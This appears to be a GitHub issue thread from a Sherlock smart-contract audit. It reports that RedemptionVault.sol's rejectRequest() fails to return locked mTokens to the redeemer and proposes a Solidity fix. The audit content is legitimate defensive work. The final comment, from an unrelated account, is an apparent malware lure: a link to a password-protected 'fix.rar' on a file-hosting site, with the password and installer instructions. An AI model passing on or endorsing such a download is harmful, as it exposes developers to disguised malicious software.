### ISSUE TITLE
Jigsaw - RedemptionVault.sol rejectRequest() does not return tokens to redeemer

### ISSUE THREAD

**Issue by sherlock-admin3** [sherlock-audit/2024-08-midas-minter-redeemer-judging#1]
Jigsaw

Medium

# RedemptionVault.sol rejectRequest() does not return tokens to redeemer

### Summary

If a redemption request is rejected by the admin, the redeemers mTokens do not get sent back, requiring admin to also call withdrawToken. This introduces the possiibility of a malicious admin rejecting requests to steal tokens, or for mistakes to happen when returning tokens to the redeemer and transferring incorrect amounts. 

https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVault.sol#L247-L255

### Root Cause

rejectRequest is missing a transfer of the tokens back to the redeemer. These tokens will have been transferred from the redeemer to the redemption vault in redeemRequest. 
https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVault.sol#L403-L408

When a request is approved, the transferred tokens are burned: 
https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVault.sol#L326

Similiarly, when a request is rejected, the transferred tokens should be returned to the user to prevent malicious admins rejecting requests in order to steal mTokens locked in the RedemptionVault. 

### Impact
Malicious admin can steal funds by rejecting requests. 

### Mitigation

Transfer the locked tokens back to the redeemer on rejection. 

function rejectRequest(uint256 requestId) external onlyVaultAdmin {
        Request memory request = redeemRequests[requestId];

        _validateRequest(request.sender, request.status);

        redeemRequests[requestId].status = RequestStatus.Canceled;
       
        _tokenTransferFromTo(
                address(mToken),
                address(this),
                request.sender,
               request.amountMToken,
                18
            );

        emit RejectRequest(requestId, request.sender);
    }

Duplicate of #84

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
